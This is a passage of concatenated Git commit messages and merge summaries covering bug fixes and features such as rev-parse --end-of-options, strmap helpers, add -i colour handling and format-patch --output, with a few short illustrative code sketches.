Johannes found a flaky hang in `t5411/test-0013-bad-protocol.sh` in the
osx-clang job of the CI/PR builds, and ran into an issue when using
the `--stress` option with the following error messages:
fatal: unable to write flush packet: Broken pipe
send-pack: unexpected disconnect while reading sideband packet
fatal: the remote end hung up unexpectedly
In this test case, the "proc-receive" hook sends an error message and
dies early. "receive-pack" on the other side of the pipe should
forward the error message of the "proc-receive" hook to the client
side, but it fails to do so. This is because "receive-pack" uses
`packet_write_fmt()` and `packet_flush()` to write pkt-line messages
to the "proc-receive" hook, and these functions die immediately when
the pipe is broken. Using the "gently" forms of these functions will
give more predictable output.
Add more "--die-*" options to test helper to test different stages of
the protocol between "receive-pack" and "proc-receive" hook.
Reported-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
New helper `filter_out_user_friendly_and_stable_output` will call the
common helper function `make_user_friendly_and_stable_output` and use
additional arguments to filter out messages for specific test cases.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The NEEDS_SSL_WITH_CURL flag was still being set in one case, but
hasn't existed since 23c4bbe28e ("build: link with curl-defined
linker flags", 2018-11-03). Remove it, and a comment which referred to
it. See 6c109904bc ("Port to HP NonStop", 2012-09-19) for the initial
addition of the comment.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The NO_R_TO_GCC_LINKER flag was still being set on some platforms. It
hasn't been used since my 0f50c8e32c ("Makefile: remove the
NO_R_TO_GCC_LINKER flag", 2019-05-17).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 1af265f0 (compat/bswap.h: simplify MSVC endianness
detection, 2020-11-08) we attempted to simplify code by assuming MSVC
builds will be for little-endian machines, since only unusably old
versions of MSVC supported big-endian MIPS and m68k architectures.
However, it's possible that MSVC could be ported to build for a
big-endian architecture again, so the simplification wasn't as
future-proof as hoped.
So let's go back to the old way of detecting MSVC, and then checking
architecture from a list of little-endian architecture macros.
Note that MSVC does not treat ARM64 as bi-endian, so we can safely treat
it as little-endian.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Helped-by: Jeff King <peff@peff.net>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Daniel Gurney <dgurney99@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The builtin version of add-interactive mistakenly loads diff colors from
color.interactive.* instead of color.diff.*. It also accidentally spells
`frag` as `fraginfo`.
Let's fix that.
Note also that we don't respect the historical `diff.color.*`. The perl
version never did, and those have been deprecated since 2007.
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl version of that command sneakily uses `git config --get-color`
to figure out the ANSI sequence to reset the color, but passes the empty
string and therefore cannot actually match any config entry.
This was missed when re-implementing the command as a built-in command.
Let's fix this, preventing the `reset` sequence from being overridden
via the config.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already maintain a list of colors in the `add_i_state`, therefore we
should use them.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In libxdiff, imitating GNU diff, the hunk headers only show the line
count if it is different from 1. When splitting hunks, the Perl version
of `git add -p` already imitates this. Let's do the same in the built-in
version of said command.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl version of that command already does that since a301973641
(add -p: print errors in separate color, 2009-02-05). The built-in
version's development started by reimplementing the initial version from
5cde71d64a (git-add --interactive, 2006-12-10) for simplicity, though,
which still printed error messages to stdout.
Let's fix that by imitating the Perl version's behavior in the built-in
version of that command.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a neat feature in `git add -i` where it allows users to select
items via unique prefixes.
In the built-in version of `git add -i`, we specifically sort the items
(unless they are already sorted) and then perform a binary search to
figure out whether the input constitutes a unique prefix. Unfortunately,
by mistake this code misidentifies matches even if the input string is
not actually a prefix of any item.
For example, in the initial menu, where there is a `status` and an
`update` command, the input `tadaa` was mistaken as a prefix of
`update`.
Let's fix this by looking a bit closer whether the input is actually a
prefix of the item at the found insert index.
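The corrected lookup can be modeled like this. It is a Python sketch of
the technique (sort, binary search, then verify the prefix), not the C
implementation; the function name and the menu list are illustrative,
with only `status` and `update` taken from the description above.

```python
import bisect


def find_unique_prefix(items, text):
    """Return the single item that starts with `text`, or None."""
    ordered = sorted(items)
    # Index at which `text` would be inserted to keep the list sorted.
    i = bisect.bisect_left(ordered, text)
    # The insert index alone proves nothing, so check that the item
    # found there really starts with the input.
    if i == len(ordered) or not ordered[i].startswith(text):
        return None
    # An exact match wins; otherwise a second match makes it ambiguous.
    if (ordered[i] != text and i + 1 < len(ordered)
            and ordered[i + 1].startswith(text)):
        return None
    return ordered[i]


menu = ["status", "update", "revert", "patch", "diff", "quit", "help"]
```

With this check in place, `tadaa` sorts between `status` and `update`
but matches neither, so the lookup reports no match.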
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We taught rev-list a new way to separate options from revisions in
19e8789b23 (revision: allow --end-of-options to end option parsing,
2019-08-06), but rev-parse uses its own parser. It should know about
--end-of-options not only for consistency, but because it may be
presented with similarly ambiguous cases. E.g., if a caller does:
git rev-parse "$rev" -- "$path"
to parse an untrusted input, then it will get confused if $rev contains
an option-like string like "--local-env-vars". Or even "--not-real",
which we'd keep as an option to pass along to rev-list.
Or even more importantly:
git rev-parse --verify "$rev"
can be confused by options, even though its purpose is safely parsing
untrusted input. On the plus side, it will always fail the --verify
part, as it will not have parsed a revision, so the caller will
generally "fail closed" rather than continue to use the untrusted
string. But it will still trigger whatever option was in "$rev"; this
should be mostly harmless, since rev-parse options are all read-only,
but I didn't carefully audit all paths.
This patch lets callers write:
git rev-parse --end-of-options "$rev" -- "$path"
and:
git rev-parse --verify --end-of-options "$rev"
which will both treat "$rev" always as a revision parameter. The latter
is a bit clunky. It would be nicer if we had defined "--verify" to
require that its next argument be the revision. But we have not
historically done so, and:
git rev-parse --verify -q "$rev"
does currently work. I added a test here to confirm that we didn't break
that.
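To make the intended behavior concrete, here is a toy Python model of
the argument handling. It is not rev-parse's parser: the function name
and the result labels are invented for this sketch, and it simplifies
by calling every non-option argument before "--" a revision.

```python
def classify_args(args):
    """Label each argument the way the scheme above would treat it."""
    seen_end_of_options = False
    as_is = False  # becomes True once "--" has been seen
    result = []
    for arg in args:
        if as_is:
            # Everything after "--" is a path, even if it starts with "-".
            result.append(("path", arg))
        elif arg == "--":
            # Parsed even after --end-of-options.
            as_is = True
            result.append(("separator", arg))
        elif not seen_end_of_options and arg.startswith("-"):
            if arg == "--end-of-options":
                seen_end_of_options = True
                result.append(("end-of-options", arg))
            else:
                result.append(("option", arg))
        else:
            # After --end-of-options, dashed arguments land here.
            result.append(("revision", arg))
    return result
```

In this model, an untrusted "$rev" such as "--local-env-vars" that
follows --end-of-options is labeled a revision rather than an option.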
A few implementation notes:
- We don't document --end-of-options explicitly in commands, but rather
in gitcli(7). So I didn't give it its own section in git-rev-parse(1).
But I did call it out specifically in the --verify section, and
include it in the examples, which should show best practices.
- We don't have to re-indent the main option-parsing block, because we
can combine our "did we see end of options" check with "does it start
with a dash". The exception is the pre-setup options, which need
their own block.
- We do however have to pull the "--" parsing out of the "does it start
with dash" block, because we want to parse it even if we've seen
--end-of-options.
- We'll leave "--end-of-options" in the output. This is probably not
technically necessary, as a careful caller will do:
git rev-parse --end-of-options $revs -- $paths
and anything in $revs will be resolved to an object id. However, it
does help a slightly less careful caller like:
git rev-parse --end-of-options $revs_or_paths
where a path "--foo" will remain in the output as long as it also
exists on disk. In that case, it's helpful to retain --end-of-options
to get passed along to rev-list, as it would otherwise see just
"--foo".
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The option-parsing loop of rev-parse checks whether the first character
of an arg is "-". If so, then it enters a series of conditionals
checking for individual options. But some options are inexplicably
outside of that outer conditional.
This doesn't produce the wrong behavior; the conditional is actually
redundant with the individual option checks, and it's really only its
fallback "continue" that we care about. But we should at least be
consistent.
One obvious alternative is that we could get rid of the conditional
entirely. But we'll be using the extra block it provides in the next
patch.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because of the order in which we check options in rev-parse, there are a
few options we accept even after a "--". This is wrong, because the
whole point of "--" is to say "everything after here is a path". Let's
move the "did we see a dashdash" check (it's called "as_is" in the code)
to the top of the parsing loop.
Note there is one subtlety here. The options are ordered so that some
are checked before we even see if we're in a repository (they continue
the loop, and if we get past a certain point, then we do the repository
setup). By moving the as_is check higher, it's also in that "before
setup" section, even though it might look at the repository via
verify_filename(). However, this works out: we'd never set as_is until
we parse "--", and we don't parse that until after doing the setup.
An alternative here to avoid the subtlety is to put the as_is check at
the top of the post-setup options. But then every pre-setup option would
have to remember to check "if (!as_is && !strcmp(...))". So while this
is a bit magical, it's harder for future code to get wrong.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since 610e2b9240 (blame: validate and peel the object names on the
ignore list, 2020-09-24) git blame checks if objects specified
with --ignore-rev and in files loaded with --ignore-revs-file and config
option blame.ignoreRevsFile are actual objects and dies if they aren't.
The intent is to report typos to the user.
This also breaks the ability to use a single ignore file for multiple
repositories. Typos are presumably less likely in files than on the
command line, so alerting is less useful here. Restore that feature by
skipping non-commits without dying.
Reported-by: Jean-Yves Avenard <jyavenard@mozilla.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Barret Rhoden <brho@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is possible to have recursive aliases like:
l = log --oneline
lg = l --graph
So the completion should detect such aliases as well.
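A minimal Python sketch of the resolution step, assuming aliases are
available as a plain name-to-definition mapping (the function name is
hypothetical, and shell aliases starting with "!" are not handled):

```python
def resolve_alias(aliases, word):
    """Follow alias definitions until a non-alias command is reached."""
    seen = set()
    while word in aliases and word not in seen:
        seen.add(word)  # guard against aliases that refer to each other
        expansion = aliases[word].split()
        if not expansion:
            break
        word = expansion[0]
    return word


aliases = {"l": "log --oneline", "lg": "l --graph"}
command = resolve_alias(aliases, "lg")
```

Here "lg" resolves through "l" to "log", which is the command whose
options the completion would want to offer.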
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For the past 15 years, we've used the hardcoded 64 as the length
limit of the filename of the output from the "git format-patch"
command. Since the value is shorter than the 80-column terminal, it
could grow a bit without line wrapping. At the same time, since the
value is longer than half of the 80-column terminal, we could fit
two or more of them in "ls" output on such a terminal if we allowed
it to be lowered.
Introduce a new command line option --filename-max-length=<n> and a
new configuration variable format.filenameMaxLength to override the
hardcoded default.
While we are at it, remove a check that the name of output directory
does not exceed PATH_MAX---this check is pointless in that by the
time control reaches the function, the caller would already have
done an equivalent of "mkdir -p", so if the system does not like an
overly long directory name, the control wouldn't have reached here,
and otherwise, we know that the system allowed the output directory
to exist. In the worst case, we will get an error when we try to
open the output file and handle the error correctly anyway.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Prepare a test script for the transition of the default branch name to
'main'.
* js/default-branch-name-adjust-t5411:
t5411: finish preparing for `main` being the default branch name
t5411: adjust the remaining support files for init.defaultBranch=main
t5411: start adjusting the support files for init.defaultBranch=main
t5411: start using the default branch name "main"
The code to detect premature EOF in the sideband demultiplexer has
been cleaned up.
* jk/sideband-more-error-checking:
sideband: diagnose more sideband anomalies
Exit codes from "git remote add" etc. were not usable by scripted
callers.
* ab/git-remote-exit-code:
remote: add meaningful exit code on missing/existing
A commit and tag object may have CR at the end of each and
every line (you can create such an object with hash-object or
using --cleanup=verbatim to decline the default clean-up
action), but it would make it impossible to have a blank line
to separate the title from the body of the message. Be lenient
and accept a line with lone CR on it as a blank line, too.
* pb/ref-filter-with-crlf:
log, show: add tests for messages containing CRLF
ref-filter: handle CRLF at end-of-line more gracefully
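The lenient rule for this topic can be illustrated with a small Python
sketch. It is not the ref-filter code, and the function name is made
up; it only shows a line holding a lone CR being accepted as the blank
separator between title and body.

```python
def split_title_and_body(message):
    """Split a message at the first blank line, tolerating a lone CR."""
    lines = message.split("\n")
    for i, line in enumerate(lines):
        # Treat a line that holds only CR as blank, too.
        if line in ("", "\r"):
            return "\n".join(lines[:i]), "\n".join(lines[i + 1:])
    return message, ""
```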
"git checkout-index" did not consistently signal an error with its
exit status.
* jk/checkout-index-errors:
checkout-index: propagate errors to exit code
checkout-index: drop error message from empty --stage=all
"git diff" and other commands that share the same machinery to
compare with working tree files have been taught to take advantage
of the fsmonitor data when available.
* nk/diff-files-vs-fsmonitor:
p7519-fsmonitor: add a git add benchmark
p7519-fsmonitor: refactor to avoid code duplication
perf lint: add make test-lint to perf tests
t/perf: add fsmonitor perf test for git diff
t/perf/p7519-fsmonitor.sh: warm cache on first git status
t/perf/README: elaborate on output format
fsmonitor: use fsmonitor data in `git diff`
More preliminary tests have been added to document desired outcome
of various "directory rename" situations.
* en/dir-rename-tests:
t6423: more involved rules for renaming directories into each other
t6423: update directory rename detection tests with new rule
t6423: more involved directory rename test
directory-rename-detection.txt: update references to regression tests
This patch will let the new `check-whitespace` GitHub workflow be happy
with the upcoming patch series that wants to search-and-replace `master`
with `main` in t9603 and some other test scripts.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Two blocks in t5570 want to align the closing double quotes, padding
with spaces if needed. Since the maximum length of those lines is
defined by the branch name `master`, the upcoming rename to `main` would
unalign the quotes.
But then, it is unclear how those aligned closing quotes should help
readability anyway, so let's just remove that padding altogether.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch actually prepares for the upcoming patches to replace
`master` with `main` in these tests: we do not want those changes to be
flagged by the new `check-whitespace` GitHub workflow (even if those
changes do not introduce the whitespace issues, they touch lines
affected by those issues without fixing them).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In b6211b89eb (tests: avoid variations of the `master` branch name,
2020-09-26), the `master[123]` branch names were renamed to
`topic_[123]`. A non-literal mention of the corresponding files was
missed in that commit.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The message in question reads awkwardly with the name "master", but will
be even more confusing once that is renamed to "main". Let's adjust it
in advance of said rename.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In `git p4 clone`, we hard-code the branch name `master` instead of
looking up what the _actual_ initial branch name is. Let's fix that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modern MSVC or Windows versions don't support big-endian, so it's
unnecessary to consider architectures when using it.
This also makes ARM64 MSVC builds succeed.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Daniel Gurney <dgurney99@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Compression programs like zip, gzip, bzip2 and xz allow adjusting the
trade-off between CPU cost and size gain with numerical options from -1
for fast compression to -9 for high compression ratio. zip also
accepts -0 for storing files verbatim. git archive directly supports
these single-digit compression levels for ZIP output and passes them to
filters like gzip.
Zstandard additionally supports compression level options -10 to -19, or
up to -22 with --ultra. This *seems* to work with git archive in most
cases, e.g. it will produce an archive with -19 without complaining, but
since it only supports single-digit compression level options this is
the same as -1 -9 and thus -9.
Allow git archive to accept multi-digit compression levels to support
the full range supported by zstd. Explicitly reject them for the ZIP
format, as otherwise deflateInit2() would just fail with a somewhat
cryptic "stream consistency error".
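The difference between reading "-19" as one level and reading it as "-1" followed by "-9" can be sketched as below. This is only an illustration: `parse_level_option()` and `level_ok_for_zip()` are hypothetical names, and the cap of 99 is an arbitrary assumption, not what git archive actually does.

```c
#include <ctype.h>
#include <stdlib.h>

/*
 * Hypothetical helper (not Git's actual code): parse an option such as
 * "-9" or "-19" as ONE compression level instead of a run of
 * single-digit options. Returns the level, or -1 if arg is not a dash
 * followed only by digits (or is implausibly large).
 */
int parse_level_option(const char *arg)
{
    char *end;
    long level;

    if (arg[0] != '-' || !isdigit((unsigned char)arg[1]))
        return -1;
    level = strtol(arg + 1, &end, 10);
    if (*end != '\0' || level > 99)
        return -1;
    return (int)level;
}

/* deflate-based ZIP output only understands levels 0 through 9. */
int level_ok_for_zip(int level)
{
    return level >= 0 && level <= 9;
}
```

A caller would parse the level once, then reject it early for ZIP rather than letting the compressor fail later with an unhelpful message.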
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 8de7eeb54b (compression: unify pack.compression configuration
parsing, 2016-11-15), we introduced identical copies of the `file_size`
helper into three test scripts, with the plan to eventually consolidate
them into a single copy.
Let's do that, and adjust the function name to adhere to the `test_*`
naming convention.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 3aef54e8b8 ("diff: munmap() file contents before running external
diff") introduced calls to diff_free_filespec_data in
run_external_diff, which may pass NULL pointers.
Fix this and prevent any such bugs in the future by making
`diff_free_filespec_data(NULL)` a no-op.
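The shape of such a NULL-tolerant cleanup function might look like the following. The struct and function names are made up for illustration and carry far fewer fields than the real diff_filespec.

```c
#include <stdlib.h>

/* Hypothetical, heavily simplified stand-in for a filespec. */
struct toy_filespec {
    char *data;
    int should_free;
};

/*
 * Release the contents of s. Passing NULL is explicitly allowed and
 * does nothing, mirroring the convention of free(NULL).
 */
void toy_free_filespec_data(struct toy_filespec *s)
{
    if (!s)
        return;
    if (s->should_free)
        free(s->data);
    s->data = NULL;
    s->should_free = 0;
}
```

Putting the check inside the callee means no caller has to remember it, which is what guards against the same class of bug reappearing.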
Fixes: 3aef54e8b8 ("diff: munmap() file contents before running external diff")
Signed-off-by: Jinoh Kang <luke1337@theori.io>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to adding strintmap for special-casing a string -> int mapping,
add a strset type for cases where we really are only interested in using
strmap for storing a set rather than a mapping. In this case, we'll
always just store NULL for the value but the different struct type makes
it clearer than code comments how a variable is intended to be used.
The difference in usage also results in some differences in API: a few
things that aren't necessary or meaningful are dropped (namely, the
free_values argument to *_clear(), and the *_get() function), and
strset_add() is chosen as the API instead of strset_put().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will facilitate adding entries to a strmap subtype in ways that
differ slightly from that of strmap_put().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix misspelled "specified" and "occurred" in documentation and
comments.
Signed-off-by: Marlon Rac Cambasis <marlonrc08@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Although strmap could be used as a string->int map, one either had to
allocate an int for every entry and then deallocate later, or one had to
do a bunch of casting between (void*) and (intptr_t).
Add some special functions that do the casting. Also, rename put->set
for such wrapper functions since 'put' implied there may be some
deallocation needed if the string was already found in the map, which
isn't the case when we're storing an int value directly in the void*
slot instead of using the void* slot as a pointer to data.
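A minimal sketch of the casting that such wrappers hide, assuming a one-slot entry type invented for this example (the names below are not the strintmap API):

```c
#include <stdint.h>

/* Hypothetical entry; Git's struct strmap_entry differs. */
struct entry {
    const char *key;
    void *value;
};

/* Store the integer directly in the pointer-sized slot; no allocation. */
void entry_set_int(struct entry *e, intptr_t v)
{
    e->value = (void *)v;
}

/* Read the integer back out of the slot. */
intptr_t entry_get_int(const struct entry *e)
{
    return (intptr_t)e->value;
}

/* Adjust the stored integer in place, as a string-keyed counter would. */
void entry_incr(struct entry *e, intptr_t amount)
{
    entry_set_int(e, entry_get_int(e) + amount);
}
```

Because nothing is allocated per entry, overwriting a value never leaves anything to free, which is the reason "set" describes the operation better than "put".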
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When strmaps are used heavily, such as is done by my new merge-ort
algorithm, and strmaps need to be cleared but then re-used (because of
e.g. picking multiple commits to cherry-pick, or due to a recursive
merge having several different merges while recursing), free-ing and
reallocating map->table repeatedly can add up in time, especially since
it will likely be reallocated to a much smaller size but the previous
merge provides a good guide to the right size to use for the next merge.
Introduce strmap_partial_clear() to take advantage of this type of
situation; it will act similar to strmap_clear() except that
map->table's entries are zeroed instead of map->table being free'd.
Making use of this function reduced the cost of
clear_or_reinit_internal_opts() by about 20% in merge-ort, and dropped
the overall runtime of my rebase testcase by just under 2%.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds a number of additional convenience functions I want/need:
* strmap_get_size()
* strmap_empty()
* strmap_remove()
* strmap_for_each_entry()
* strmap_get_entry()
I suspect the first four are self-explanatory.
strmap_get_entry() is similar to strmap_get() except that instead of just
returning the void* value that the string maps to, it returns the
strmap_entry that contains both the string and the void* value (or
NULL if the string isn't in the map). This is helpful because it avoids
multiple lookups, e.g. in some cases a caller would need to call:
* strmap_contains() to check that the map has an entry for the string
* strmap_get() to get the void* value
* <do some work to update the value>
* strmap_put() to update/overwrite the value
If the void* pointer returned really is a pointer, then the last step is
unnecessary, but if the void* pointer is just cast to an integer then
strmap_put() will be needed. In contrast, one can call strmap_get_entry()
and then:
* check if the string was in the map by whether the pointer is NULL
* access the value via entry->value
* directly update entry->value
meaning that we can replace two or three hash table lookups with one.
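The single-lookup pattern can be illustrated with a toy map that counts how often it is searched. Everything here (`toy_map`, `toy_get_entry()`, `toy_bump()`, the linear search) is an assumption made for the example, not the strmap implementation.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct toy_entry {
    const char *key;
    void *value;
};

struct toy_map {
    struct toy_entry *items;
    size_t nr;
    unsigned lookups; /* how many searches were performed */
};

/* Return the entry for key, or NULL if the key is not in the map. */
struct toy_entry *toy_get_entry(struct toy_map *m, const char *key)
{
    size_t i;

    m->lookups++;
    for (i = 0; i < m->nr; i++)
        if (!strcmp(m->items[i].key, key))
            return &m->items[i];
    return NULL;
}

/*
 * Increment an integer stored in the value slot using one lookup:
 * the NULL check replaces "contains", and the entry is updated in
 * place instead of being written back with a second search.
 */
int toy_bump(struct toy_map *m, const char *key)
{
    struct toy_entry *e = toy_get_entry(m, key);

    if (!e)
        return -1;
    e->value = (void *)((intptr_t)e->value + 1);
    return 0;
}
```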
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that all the external users of head_hash have been converted to
use opts->orig_head instead, we can stop returning head_hash from
get_revision_ranges().
Because we want to pass the full object names back to the caller in
`revisions` the find_unique_abbrev_r() call that was used to initialize
`head_hash` is replaced with oid_to_hex().
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rather than passing a string around, pass the struct object_id that the
string was created from, and call oid_to_hex() when we write the file.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already have a struct object_id containing the oid that we want to
set ORIG_HEAD to so use that rather than converting it to a string and
then calling get_oid() on that string.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After rebasing, ORIG_HEAD is supposed to point to the old HEAD of the
rebased branch. The code used find_unique_abbrev() to obtain the
object name of the old HEAD and wrote to both
.git/rebase-merge/orig-head (used by `rebase --abort` to go back to
the previous state) and to ORIG_HEAD. The buffer find_unique_abbrev()
gives back is volatile, unfortunately, and was overwritten after the
former file is written but before ORIG_HEAD is written, leaving an
incorrect object name in it.
Avoid relying on the volatile buffer of find_unique_abbrev(), and
instead supply our own buffer to keep the object name.
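The hazard is easy to reproduce with any function that hands back a pointer into shared static storage. In this sketch, `short_name()` is a hypothetical stand-in with a single static buffer (the real function's buffering scheme is not modeled here), and `short_name_r()` shows the caller-supplied-buffer alternative.

```c
#include <stdio.h>

/*
 * Hypothetical stand-in: formats into one static buffer, so every
 * call overwrites what earlier callers were handed.
 */
const char *short_name(unsigned value)
{
    static char buf[16];

    snprintf(buf, sizeof(buf), "%07x", value);
    return buf;
}

/* Caller-owned buffer: the result stays valid across later calls. */
void short_name_r(char *out, size_t len, unsigned value)
{
    snprintf(out, len, "%07x", value);
}
```

A pointer obtained from `short_name()` silently changes meaning after the next call, whereas a buffer filled by `short_name_r()` keeps its contents until the caller overwrites it.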
I think that all of the users of head_hash should actually be using
opts->orig_head instead, as passing a string rather than a struct
object_id around is a holdover from the scripted implementation. This
patch just fixes the immediate bug and adds a regression test based on
Caspar's reproduction example[1]. The users will be converted to use
struct object_id and head_hash removed in the next few commits.
[1] https://lore.kernel.org/git/CAFzd1+7PDg2PZgKw7U0kdepdYuoML9wSN4kofmB_-8NHrbbrHg@mail.gmail.com
Reported-by: Caspar Duregger <herr.kaste@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We've never intended to support diff's --output option in format-patch.
And until baa4adc66a (parse-options: disable option abbreviation with
PARSE_OPT_KEEP_UNKNOWN, 2019-01-27), it was impossible to trigger. We
first parse the format-patch options before handing the remainder off to
setup_revisions(). Before that commit, we'd accept "--output=foo" as an
abbreviation for "--output-directory=foo". But afterwards, we don't
check abbreviations, and --output gets passed to the diff code.
This results in nonsense behavior and bugs. The diff code will have
opened a filehandle at rev.diffopt.file, but we'll overwrite that with
our own handles that we open for each individual patch file. So the
--output file will always just be empty. But worse, the diff code also
sets rev.diffopt.close_file, so log_tree_commit() will close the
filehandle itself. And then the main loop in cmd_format_patch() will try
to close it again, resulting in a double-free.
The simplest solution would be to just disallow --output with
format-patch, as nobody ever intended it to work. However, we have
accidentally documented it (because format-patch includes diff-options).
And it does work with "git log", which writes the whole output to the
specified file. It's easy enough to make that work for format-patch,
too: it's really the same as --stdout, but pointed at a specific file.
We can detect the use of the --output option by the "close_file" flag
(note that we can't use rev.diffopt.file, since the diff setup will
otherwise set it to stdout). So we just need to unset that flag, but
don't have to do anything else. Our situation is otherwise exactly like
--stdout (note that we don't fclose() the file, but nor does the stdout
case; exiting the program takes care of that for us).
Reported-by: Johannes Postler <johannes.postler@txture.io>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In format-patch we're either outputting to stdout or to individual files
in an output directory (which may be just "./"). Our logic for whether
to open a new file for each patch is checked with "!use_stdout", but it
is equally correct to check for a non-NULL output_directory.
The distinction will matter when we add a new single-stream output in a
future patch, when only one of the three methods will want individual
files. Let's swap the logic here in preparation.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --stdout and --output-directory options are mutually exclusive, but
it's hard to tell from reading the code. We have three separate
conditionals that check for use_stdout, and it's only after we've set up
the output_directory fully that we check whether the user also specified
--stdout.
Instead, let's check the exclusion explicitly first, then have a single
conditional that handles stdout versus an output directory. This is
slightly easier to follow now, and also will keep things sane when we
add another output mode in a future patch.
We'll add a few tests as well, covering the mutual exclusion and the
fact that we are not confused by a configured output directory.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Early text written in 2006 explains the "--abbrev=<n>" option to
"show only a partial prefix", without saying that the length of the
partial prefix is not necessarily the number given to the option to
ensure that the output names the object uniquely.
Update documentation for the diff family of commands, "blame",
"branch --verbose", "ls-files" and "ls-tree" to stress that the
short prefix must uniquely refer to an object, and <n> is merely
the minimum number of hexdigits used in the prefix.
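The rule "at least <n> hexdigits, but as many as uniqueness requires" can be sketched over a small array of names. `unique_abbrev_len()` is a hypothetical helper that scans a plain list; it assumes the names are distinct and says nothing about how Git searches its object database.

```c
#include <stddef.h>
#include <string.h>

/*
 * Return the length of the shortest prefix of names[target] that is
 * at least min_len characters long and is not a prefix of any other
 * name in the array. Assumes all names are distinct.
 */
size_t unique_abbrev_len(const char **names, size_t nr,
                         size_t target, size_t min_len)
{
    size_t full = strlen(names[target]);
    size_t len = min_len < full ? min_len : full;
    size_t i;

    for (i = 0; i < nr; i++) {
        if (i == target)
            continue;
        /* Lengthen while this other name still shares the prefix. */
        while (len < full && !strncmp(names[i], names[target], len))
            len++;
    }
    return len;
}
```

With the names "abc123", "abd999" and "f00ba4", asking for 2 digits of the first name yields 3, because "ab" is ambiguous, while asking for 4 yields exactly 4.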
Helped-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The -L option is documented to accept no pathspec, but the
command line option parser has allowed the combination without
checking so far. Ensure that there is no pathspec when the -L
option is in effect to fix this.
Incidentally, this change fixes another bug in the command line
